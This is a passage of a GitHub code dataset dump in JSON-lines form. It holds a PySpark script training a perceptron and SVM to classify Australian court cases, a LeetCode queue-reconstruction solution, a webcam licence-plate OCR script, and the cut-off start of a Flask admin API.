generated using the error, that is, difference between 'Actual_output' and 'Predicted_output'\n\t\t# Following RDD contains x[1]-> learning Rate * (Actual_Output - Predicted_Output) \n\t\t\n\t\t# Update the weight and bias of perceptron\n\t\tweights += yPredicted.map(lambda x: (1,( x[1] * learningRate*(x[0]-x[2])))).reduceByKey(np.add).collect()[0][1]\n\t\tbias += yPredicted.map(lambda x: (1,(learningRate*(x[0]-x[2])))).reduceByKey(add).collect()[0][1]\n\t\t\n\t\t# Calculate the training error, that is, Number of misclassifications made by perceptron\n\t\ttrainingError = yPredicted.map(lambda x : (1,abs(x[0] - x[2]) )).reduceByKey(add).collect()[0][1]\n\n\n\t\tprint('#'*10, 'Iteration', currentIteration + 1,'#'*10)\n\t\tprint('Weights:', weights )\n\t\tprint('Bias:', bias)\n\t\tprint('l2 Norm of weights vector:',np.linalg.norm(weights))\n\t\tprint('Number of incorrectly classified labels (Training Error):', trainingError,'\\n')\n\n\t\toldTrainingError = trainingError\n\t\tlistOfTrainingError.append(trainingError)\n\n\t\t# Early Stop condition: if the training error becomes 0, stop the training\n\t\tif trainingError == 0:\n\t\t\tprint('Training stopped at iteration', currentIteration + 1)\n\t\t\tbreak\n\n\t\tcurrentIteration += 1\n\t# \n\n\tprint(\"### PERCEPTRON MODEL's training completed..........\",'\\n')\n\n\t# Calculating the time for training the model\n\ttrainingCompletionTimePerceptron = datetime.now()\n\ttrainingTimePerceptron = trainingCompletionTimePerceptron - TrainingDatasetetPreprocessingCompletionTime\n\t\n\n\t#######################################################################################\n\t#################### 2.2 Train the Support Vector Model ##########################\n\t#######################################################################################\n\n\t# Initialize the different variables\n\tnumberOfFeatures = 10000\n\tlearningRate = 0.001\n\tcoefficients = np.zeros(numberOfFeatures)\n\tgradients = np.zeros(numberOfFeatures)\n\ttotalNumberOfIterations = 400\n\tcurrentIteration = 0\n\tlistOfCost = []\n\toldCost = float(\"inf\")\n\tcRegularisationCoefficient = n/10000000000000000\n\tintercept = 0\n\t# oldregressionCoefficients = np.zeros(numberOfFeatures)\n\n\n\n\tprint(\"### SUPPORT VECTOR MACHINE MODEL's training started..........\",'\\n')\n\n\twhile (currentIteration < totalNumberOfIterations):\n\t\t\n\t\t# Update the cost\n\t\tcost = (float(1)/n)*trainingDataSVM.map(lambda x: (1, max(float(0), 1-x[0]*(np.dot(coefficients, x[1])-intercept)))).reduceByKey(np.add).collect()[0][1]\n\t\tcost += (float(1)/float(2)*n*cRegularisationCoefficient)*((np.linalg.norm(coefficients))**2)\n\t\t\n\t\t\n\t\t# Update Gradients\n\t\tgradients = (float(1)/n)*trainingDataSVM.map(lambda x: (1,(0 if (x[0]*(np.dot(coefficients, x[1])-intercept)) >= float(1) else -np.dot(x[0],x[1])))).reduceByKey(np.add).collect()[0][1]\n\t\t\n\t\tgradients += (float(2)/n*cRegularisationCoefficient)*(coefficients)\n\t\t\n\t\t# update intercept\n\t\tinterceptGradient = (float(1)/n)*trainingDataSVM.map(lambda x: (1,(0 if (x[0]*(np.dot(coefficients, x[1])-intercept)) >= float(1) else x[0]))).reduceByKey(np.add).collect()[0][1]\n\t\t\n\n\t\t# Update Parameters\n\t\tcoefficients -= learningRate*gradients\n\t\tintercept -= learningRate*interceptGradient\n\n\t\tprint('#'*10, 'Iteration', currentIteration + 1,'#'*10)\n\t\tprint('Cost:', cost)\n\t\tprint('Intercept:',intercept)\n\t\tprint('Coefficients:', coefficients)\n\t\tprint('Margin:',2/np.linalg.norm(coefficients),'\\n')\n\t\t# BOLD DRIVER\n\t\tif (oldCost > cost):\n\t\t\tlearningRate *= 1.05\n\t\telse:\n\t\t\tlearningRate *= 0.5\n\n\n\n\t\tlistOfCost.append(cost)\n\n\t\t######### Early Stop\n\t\tif oldCost-cost < 0.0001:\n\t\t\tprint('Training stopped at iteration', currentIteration + 1)\n\t\t\tbreak\n\t\t\n\t\toldCost = cost\n\n\t\tcurrentIteration += 1\n\n\t\t# print(cost)\n\n\tprint(\"### SUPPORT VECTOR MACHINE MODEL's training completed..........\",'\\n')\n\n\t# # Calculating the time for training the model\n\ttrainingCompletionTimeSVM = datetime.now()\n\ttrainingTimeSVM = trainingCompletionTimeSVM - trainingCompletionTimePerceptron\n\n\n\n\t#######################################################################################\n\t#################### 3. Read the testing dataset and preprocess it ####################\n\t#######################################################################################\n\n\t# Read the dataset \n\ttestData = sc.textFile(sys.argv[3])\n\n\t# Each entry in validLines will be a line from the text file\n\tvalidDocLinesTest = testData.filter(lambda x : 'id' in x and 'url=' in x)\n\n\t# Now, we transform it into a set of (docID, text) pairs\n\tkeyAndTextTest = validDocLinesTest.map(lambda x : (x[x.index('id=\"') + 4 : x.index('\" url=')], x[x.index('\">') + 2:][:-6])) \n\n\t# remove all non letter characters\n\tkeyAndWordsListTest = keyAndTextTest.map(lambda x : (str(x[0]), regex.sub(' ', x[1]).lower().split()))\n\n\t# Get a RDD that has, for each (docID, [\"word1\", \"word2\", \"word3\", ...]),\n\t# (\"word1\", docID), (\"word2\", docId), ...\n\tallWordsWithDocIDTest = keyAndWordsListTest.flatMap(lambda x: ((j, x[0]) for j in x[1]))\n\n\t# Join and link them, to get a set of (\"word1\", (dictionaryPos, docID)) pairs\n\tallDictionaryWordsTest = dictionary.join(allWordsWithDocIDTest)\n\n\t# Drop the actual word itself to get a set of (docID, dictionaryPos) pairs\n\tjustDocAndPosTest = allDictionaryWordsTest.map(lambda x: (x[1][1],x[1][0]))\n\n\t# Get a set of (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\tallDictionaryWordsInEachDocTest = justDocAndPosTest.groupByKey()\n\n\t# The following line this gets us a set of\n\t# (docID, [dictionaryPos1, dictionaryPos2, dictionaryPos3...]) pairs\n\t# and converts the dictionary positions to a bag-of-words numpy array...\n\tallDocsAsNumpyArraysTest = allDictionaryWordsInEachDocTest.map(lambda x: (x[0], buildArray(x[1])))\n\n\t# Now, create a version of allDocsAsNumpyArrays where, in the array,\n\t# every entry is either zero or one.\n\t# A zero means that the word does not occur,\n\t# and a one means that it does.\n\tzeroOrOneTest = allDocsAsNumpyArraysTest.map(lambda x: (x[0],np.where(x[1] > 0, 1, 0)))\n\n\t# Perceptron\n\t# Create a RDD of testing data and derive features and labels ... x[0]-> label, x[1]-> features\n\tyLabelAndXFeaturesPerceptron = zeroOrOneTest.map(lambda x: (getLabelPerceptron(x[0]),x[1]))\n\ttestingDataPerceptron = yLabelAndXFeaturesPerceptron\n\n\t# SVM\n\t# Create a RDD of testing data and derive features and labels ... x[0]-> label, x[1]-> features\n\tyLabelAndXFeaturesSVM = zeroOrOneTest.map(lambda x: (getLabelSVM(x[0]),x[1]))\n\ttestingDataSVM = yLabelAndXFeaturesSVM\n\n\t# Cache the RDD containing labels and features extracted out of testing data\n\t#testingData.cache()\n\n\t# Calculating the time for reading and preprocessing the testing data\n\tTestingDatasetetPreprocessingCompletionTime = datetime.now()\n\ttimeToReadTestDataAndPreProcess = TestingDatasetetPreprocessingCompletionTime - trainingCompletionTimeSVM\n\n\t###################################################################################################\n\t################## 4.1 Predict the labels using the Perceptron Model ####################\n\t###################################################################################################\n\n\n\t# Make the prediction using Perceptron and store results in (x[2]) \n\tyLabelAndXFeaturesPrediction = testingDataPerceptron.map(lambda x: (x[0],x[1],(np.heaviside(np.dot(weights, x[1]) + bias , 1))))\n\n\t# Function to calculate True Positives\n\tdef calculateTruePositives(x):\n\t if (x[0] == 1 and x[2] == 1): # the article was Australian court case (x[0]) and the prediction was also Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Positives\n\tdef calculateFalsePositives(x):\n\t if (x[0] == 0 and x[2] == 1): # the article was not Australian court case (x[0]) but the prediction was Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Negatives\n\tdef calculateFalseNegatives(x):\n\t if (x[0] == 1 and x[2] == 0): # the article was Australian court case (x[0]) but the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate True Negatives\n\tdef calculateTrueNegatives(x):\n\t if (x[0] == 0 and x[2] == 0): # the article was not Australian court case (x[0]) and the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Out of total positive labels predicted, how many correctly classified as positive, that is PPV\n\tdef precision(x):\n\t # Number of true positives/ (Number of true positives + Number of false positives) \n\t # return truePositive/(truePositive + falsePositive)\n\t return x[1][0]/(float(x[1][0] + x[1][1]))\n\n\t# Out of actual positive labels, how many correctly classified as positive, that is, TPR\n\tdef recall(x):\n\t # Number of true positives/ (Number of true positives + Number of false Negatives) \n\t # return truePositive/(truePositive + falseNegative)\n\t return x[1][0]/(float(x[1][0] + x[1][2]))\n\t \n\t \n\t# Calculate 'True Positives', 'False Positives' and 'False Negatives'\n\tcalcTP_FP_FN = yLabelAndXFeaturesPrediction.map(lambda x: (1, np.array([calculateTruePositives(x), calculateFalsePositives(x), calculateFalseNegatives(x),calculateTrueNegatives(x)]))).reduceByKey(np.add)\n\n\tprint('')\n\tprint ('#'*10, ' PERCEPTRON - RESULTS ' ,'#'*10)\n\tprint('Number of True Positives:', calcTP_FP_FN.collect()[0][1][0])\n\tprint('Number of False Positives:', calcTP_FP_FN.collect()[0][1][1])\n\tprint('Number of False Negatives:', calcTP_FP_FN.collect()[0][1][2])\n\tprint('Number of True Negatives:', calcTP_FP_FN.collect()[0][1][3])\n\tprint('')\n\n\t# Calculate F1 score\n\tcalculateF1score = calcTP_FP_FN.map(lambda x: (precision(x), recall(x))).map(lambda x: 2*x[0]*x[1] / (x[0] + x[1])).collect()[0]\n\tprint('F1 score for classifier =',round(calculateF1score*100,2),'%')\n\tprint('')\n\n\t# Calculating the testing time (making predictions using the model)\n\ttestingCompletionTimePerceptron = datetime.now()\n\ttestingTimePerceptron = testingCompletionTimePerceptron - TestingDatasetetPreprocessingCompletionTime\n\n\t# calculate the total end to end time for program\n\ttotalTimePerceptron = timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess + trainingTimePerceptron + testingTimePerceptron\n\t\n\n\n\tprint(\"Time taken to read Testing and Training Data and preprocess:\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess)\n\tprint(\"Time taken to train the Perceptron model:\", trainingTimePerceptron)\n\tprint(\"Time taken to test the Perceptron model:\", testingTimePerceptron)\n\tprint(\"Total Time taken by Perceptron:\", totalTimePerceptron)\n\tprint ('#'*20)\n\n\t# List to store the results of task 1\n\tansForTask1 = []\n\n\tansForTask1.append(('#'*10, ' PERCEPTRON - RESULTS ' ,'#'*10))\n\tansForTask1.append(('F1 score for classifier =',round(calculateF1score*100,2),'%'))\n\n\tansForTask1.append('')\n\tansForTask1.append((\"Time taken to read Testing and Training Data and preprocess them (days:seconds:microsecond):\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess))\n\tansForTask1.append((\"Time taken to train the Perceptron model (days:seconds:microsecond):\", trainingTimePerceptron))\n\tansForTask1.append((\"Time taken to test the Perceptron model (days:seconds:microsecond):\", testingTimePerceptron))\n\tansForTask1.append((\"Total Time taken by Perceptron:\", totalTimePerceptron))\n\n\tansForTask1.append('')\n\tansForTask1.append(('Number of True Positives', calcTP_FP_FN.collect()[0][1][0]))\n\tansForTask1.append(('Number of False Positives', calcTP_FP_FN.collect()[0][1][1]))\n\tansForTask1.append(('Number of False Negatives', calcTP_FP_FN.collect()[0][1][2]))\n\tansForTask1.append(('Number of True Negatives', calcTP_FP_FN.collect()[0][1][3]))\n\tansForTask1.append('')\n\n\t###################################################################################################\n\t############### 4.2 Predict the labels using the Support Vector Machine Model ####################\n\t###################################################################################################\n\n\t# Prediction Function using SVM\n\tdef predictionSVM(x):\n\n\t if (np.dot(coefficients, x) - intercept >= 0):\n\t return 1\n\t else:\n\t return -1\n\n\t# Make the prediction using the function 'predictionSVM'\n\tyLabelAndXFeaturesPrediction = testingDataSVM.map(lambda x: (x[0],x[1],predictionSVM(x[1]),np.dot(coefficients,x[1])))\n\n\t# Function to calculate True Positives\n\tdef calculateTruePositives(x):\n\t if (x[0] == 1 and x[2] == 1): # the article was Australian court case (x[0]) and the prediction was also Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Positives\n\tdef calculateFalsePositives(x):\n\t if (x[0] == -1 and x[2] == 1): # the article was not Australian court case (x[0]) but the prediction was Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate False Negatives\n\tdef calculateFalseNegatives(x):\n\t if (x[0] == 1 and x[2] == -1): # the article was Australian court case (x[0]) but the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Function to calculate True Negatives\n\tdef calculateTrueNegatives(x):\n\t if (x[0] == -1 and x[2] == -1): # the article was not Australian court case (x[0]) and the prediction was not Australian court case x[2]\n\t return 1\n\t else:\n\t return 0\n\n\t# Out of total positive labels predicted, how many correctly classified as positive, that is PPV\n\tdef precision(x):\n\t # Number of true positives/ (Number of true positives + Number of false positives) \n\t # return truePositive/(truePositive + falsePositive)\n\t return x[1][0]/(float(x[1][0] + x[1][1]))\n\n\t# Out of actual positive labels, how many correctly classified as positive, that is, TPR\n\tdef recall(x):\n\t # Number of true positives/ (Number of true positives + Number of false Negatives) \n\t # return truePositive/(truePositive + falseNegative)\n\t return x[1][0]/(float(x[1][0] + x[1][2]))\n\t \n\t \n\t# Calculate 'True Positives', 'False Positives' and 'False Negatives'\n\tcalcTP_FP_FN = yLabelAndXFeaturesPrediction.map(lambda x: (1, np.array([calculateTruePositives(x), calculateFalsePositives(x), calculateFalseNegatives(x),calculateTrueNegatives(x)]))).reduceByKey(np.add)\n\n\tprint('')\n\tprint('#'*10, ' SUPPORT VECTOR - RESULTS ' ,'#'*10)\n\tprint('Number of True Positives:', calcTP_FP_FN.collect()[0][1][0])\n\tprint('Number of False Positives:', calcTP_FP_FN.collect()[0][1][1])\n\tprint('Number of False Negatives:', calcTP_FP_FN.collect()[0][1][2])\n\tprint('Number of True Negatives:', calcTP_FP_FN.collect()[0][1][3])\n\tprint('')\n\n\t# Calculate F1 score\n\tcalculateF1score = calcTP_FP_FN.map(lambda x: (precision(x), recall(x))).map(lambda x: 2*x[0]*x[1] / (x[0] + x[1])).collect()[0]\n\tprint('F1 score for classifier =',round(calculateF1score*100,2),'%')\n\tprint('')\n\n\t# Calculating the testing time (making predictions using the model)\n\ttestingCompletionTime = datetime.now()\n\ttestingTimeSVM = testingCompletionTime - testingCompletionTimePerceptron\n\n\t\n\t# calculate the total end to end time for program\n\ttotalTimeSVM = timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess + trainingTimeSVM + testingTimeSVM\n\n\tprint(\"Time taken to read Testing and Training Data and preprocess them (h:mm:ss):\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess)\n\tprint(\"Time taken to train the Support Vector Machine model (h:mm:ss):\", trainingTimeSVM)\n\tprint(\"Time taken to test using the Support Vector Machine model (h:mm:ss):\", testingTimeSVM)\n\tprint(\"Total Time taken by Support Vector Machine (h:mm:ss):\", totalTimeSVM)\n\tprint ('#'*20)\n\n\t# List to store the results of task 3\n\tansForTask1.append(('#'*10, ' SUPPORT VECTOR - RESULTS ' ,'#'*10))\n\tansForTask1.append(('F1 score for classifier =',round(calculateF1score*100,2),'%'))\n\n\tansForTask1.append('')\n\tansForTask1.append((\"Time taken to read Testing and Training Data and preprocess them (days:seconds:microsecond):\", timeToReadTrainDataAndPreProcess + timeToReadTestDataAndPreProcess))\n\tansForTask1.append((\"Time taken to train the Support Vector Machine model(days:seconds:microsecond):\", trainingTimeSVM))\n\tansForTask1.append((\"Time taken to test using the Support Vector Machine model (days:seconds:microsecond):\", testingTimeSVM))\n\tansForTask1.append((\"Total Time taken by Support Vector Machine (days:seconds:microsecond):\", totalTimeSVM))\n\n\tansForTask1.append('')\n\tansForTask1.append(('Number of True Positives', calcTP_FP_FN.collect()[0][1][0]))\n\tansForTask1.append(('Number of False Positives', calcTP_FP_FN.collect()[0][1][1]))\n\tansForTask1.append(('Number of False Negatives', calcTP_FP_FN.collect()[0][1][2]))\n\tansForTask1.append(('Number of True Negatives', calcTP_FP_FN.collect()[0][1][3]))\n\n\t# Save the results of task1 in a text file\n\tsc.parallelize(ansForTask1).coalesce(1, shuffle = False).saveAsTextFile(sys.argv[4]) \n\n\n\tsc.stop\n\n", "repo_name": "gagankaushal/Australian_Court_cases_SVM_and_Perceptron_scratch", "sub_path": "main_task1.py", "file_name": "main_task1.py", "file_ext": "py", "file_size_in_byte": 26078, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyspark.SparkContext", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 22, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 32, "usage_type": "call"}, {"api_name": "operator.add", "line_number": 40, "usage_type": "argument"}, {"api_name": "sys.argv", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 77, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.subtract", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 151, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 219, "usage_type": "call"}, {"api_name": "numpy.heaviside", "line_number": 228, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 235, "usage_type": "attribute"}, {"api_name": "operator.add", "line_number": 236, "usage_type": "argument"}, {"api_name": "operator.add", "line_number": 239, "usage_type": "argument"}, {"api_name": "numpy.linalg.norm", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 245, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 262, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 262, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 290, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 290, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 291, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 295, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 300, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 300, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 311, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 336, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 336, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 346, "usage_type": "attribute"}, {"api_name": "numpy.where", "line_number": 379, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 395, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 395, "usage_type": "name"}, {"api_name": "numpy.heaviside", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 404, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 448, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 448, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 464, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 464, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 554, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 554, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 570, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 570, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 600, "usage_type": "attribute"}]} +{"seq_id": "39436138652", "text": "from typing import List\r\n\r\n\r\nclass Solution:\r\n def reconstructQueue(self, people: List[List[int]]) -> List[List[int]]:\r\n res = []\r\n people.sort(key = lambda x: (-x[0],x[1]))\r\n for p in people:\r\n res.insert(p[1], p)\r\n return res\r\n\r\n\r\npeople = [[7,0], [4,4], [7,1], [5,0], [6,1], [5,2]]\r\ns = Solution()\r\nans=s.reconstructQueue(people)\r\nprint(ans)\r\n", "repo_name": "Akram1234/June-LeetCoding-Challenge", "sub_path": "Week 1/Queue Reconstruction by Height.py", "file_name": "Queue Reconstruction by Height.py", "file_ext": "py", "file_size_in_byte": 388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.List", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "23515365645", "text": "'''\r\nobjective: detect number plate from camera\r\nDate: 2021-12-16\r\nAuthor: Nitish Kumar Sharma\r\nEmail: nitish.ns378@gmail.com\r\n\r\nLicense: MIT\r\nMIT License (c) 2021 Nitish Kumar Sharma\r\nThis code is licensed under the MIT license (see LICENSE.txt for details)\r\nYou are free to use this code in your own projects, as long as you give credit to the original author.\r\nall rights reserved. by Nitish Kumar Sharma\r\n\r\n'''\r\n\r\n# import open cv and read image nad display it\r\nfrom typing import Pattern\r\nimport cv2\r\nimport numpy as np\r\nimport imutils\r\n# import easyocr\r\nimport sys\r\nimport os\r\n# from PIL import Image\r\nfrom pytesseract import pytesseract\r\nimport re\r\nimport copy\r\n\r\n# Chnage path to your path\r\npath_to_tesseract = \"C:\\\\Program Files\\\\Tesseract-OCR\\\\tesseract.exe\"\r\npytesseract.tesseract_cmd = path_to_tesseract\r\n# read image from images folder and display it\r\n\r\ndef filter_text(text):\r\n print(\"Filtering text\")\r\n print(\"License plate Number (without Filter):{}\".format(text.replace(\"\\n\\n\",'')))\r\n Pattern = re.compile(r'[^a-zA-Z0-9\\s]')\r\n text = Pattern.sub('', copy.copy(text))\r\n print(\"License plate Number:{}\".format(text.replace(\"\\n\\n\",'')))\r\n\r\n\r\nvideo = cv2.VideoCapture(0)\r\nwhile True:\r\n _, image = video.read()\r\n cv2.imshow(\"Capturing\", image)\r\n image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n # cv2.imshow('gray', image_gray)\r\n # bilateral filter\r\n image_gray_blur = cv2.bilateralFilter(image_gray, 10, 75, 75)\r\n # cv2.imshow('blur', image_gray_blur)\r\n print(\"------------------Getting text from image--------------\")\r\n results = pytesseract.image_to_string(image_gray_blur, lang='eng')\r\n # print(results[:-1])\r\n # print(results)\r\n filter_text(results)\r\n print(\"------------------Getting text from image--------------\")\r\n edges = cv2.Canny(image_gray_blur, 100, 200)\r\n # cv2.imshow('edges', edges)\r\n # find contours and apy a mask\r\n keypoint = cv2.findContours(edges.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n countours = imutils.grab_contours(keypoint)\r\n countours = sorted(countours, key=cv2.contourArea, reverse=True)[:10]\r\n # print(countours)\r\n for c in countours:\r\n # compute the center of the contour\r\n # approx = cv2.approxPolyDP(c, 0.02 * cv2.arcLength(c, True), True)\r\n approx = cv2.approxPolyDP(c,10, True)\r\n if len(approx) == 4:\r\n ll = approx\r\n location = cv2.minAreaRect(c)\r\n # print(location)\r\n box = cv2.boxPoints(location)\r\n box = np.int0(box)\r\n cv2.drawContours(image, [box], -1, (0, 0, 255), 2)\r\n cv2.imshow('rectangles', image)\r\n # masking the image\r\n try:\r\n mask = np.zeros(image_gray.shape, dtype=\"uint8\")\r\n new_img = cv2.drawContours(mask, [ll], 0, 255, -1)\r\n new_img = cv2.bitwise_and(image, image, mask=new_img)\r\n # cv2.imshow('mask', new_img)\r\n\r\n (x,y) = np.where(mask == 255)\r\n (x1, y1) = (np.min(x), np.min(y))\r\n (x2, y2) = (np.max(x), np.max(y))\r\n crop_img = image[x1:x2+1, y1:y2+1]\r\n # save the image\r\n # cv2.imwrite('crop.jpg', crop_img)\r\n # cv2.imshow('crop', crop_img)\r\n \r\n # Use Easy OCR to read the text\r\n # reader = easyocr.Reader(['en'])\r\n # results = reader.readtext(crop_img)\r\n print(\"Getting text from image\")\r\n results = pytesseract.image_to_string(crop_img, lang='eng')\r\n # print(results[:-1])\r\n # print(results)\r\n filter_text(results)\r\n print(\"Done\")\r\n except:\r\n print(\"Error\")\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\ncv2.release()\r\ncv2.destroyAllWindows()\r\n", "repo_name": "kumarnitish378/Number_plate_and_face_detection", "sub_path": "Live_number_plate_detection.py", "file_name": "Live_number_plate_detection.py", "file_ext": "py", "file_size_in_byte": 3683, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pytesseract.pytesseract.tesseract_cmd", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pytesseract.pytesseract", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Pattern", "line_number": 36, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 36, "usage_type": "call"}, {"api_name": "typing.Pattern.sub", "line_number": 37, "usage_type": "call"}, {"api_name": "typing.Pattern", "line_number": 37, "usage_type": "name"}, {"api_name": "copy.copy", "line_number": 37, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 41, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 44, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 45, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cv2.bilateralFilter", "line_number": 48, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract.image_to_string", "line_number": 51, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract", "line_number": 51, "usage_type": "name"}, {"api_name": "cv2.Canny", "line_number": 56, "usage_type": "call"}, {"api_name": "cv2.findContours", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.RETR_TREE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 59, "usage_type": "attribute"}, {"api_name": "imutils.grab_contours", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 61, "usage_type": "attribute"}, {"api_name": "cv2.approxPolyDP", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.minAreaRect", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.int0", "line_number": 72, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 84, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract.image_to_string", "line_number": 94, "usage_type": "call"}, {"api_name": "pytesseract.pytesseract", "line_number": 94, "usage_type": "name"}, {"api_name": "cv2.waitKey", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.release", "line_number": 103, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 104, "usage_type": "call"}]} +{"seq_id": "42761371328", "text": "# -*- coding: utf-8 -*-\n\"\"\"\n@Time: 2020/07/19 15:15:04\n@File: admin_operating_api\n@Auth: money\n\"\"\"\nimport time\nimport datetime\nfrom flask import request\nfrom middleware.auth import response\nfrom initialize import log\nfrom initialize import client\nfrom initialize import init_stamp\nfrom constant import constant\n\n\ndef works_list_api(is_recommend):\n \"\"\"\n 作品列表调用接口\n :param is_recommend: 是否推荐 true推荐 false不推荐\n \"\"\"\n data = {}\n try:\n # 参数\n num = request.args.get(\"num\")\n page = request.args.get(\"page\")\n type = request.args.get(\"type\") # 发现传default, 微图传pic, 影集传video\n # 校验参数\n if not num:\n return response(msg=\"Bad Request: Miss params: 'num'.\", code=1, status=400)\n if not page:\n return response(msg=\"Bad Request: Miss params: 'page'.\", code=1, status=400)\n if int(page) < 1 or int(num) < 1:\n return response(msg=\"Bad Request: Params 'page' or 'num' is erroe.\", code=1, status=400)\n if type not in [\"default\", \"pic\", 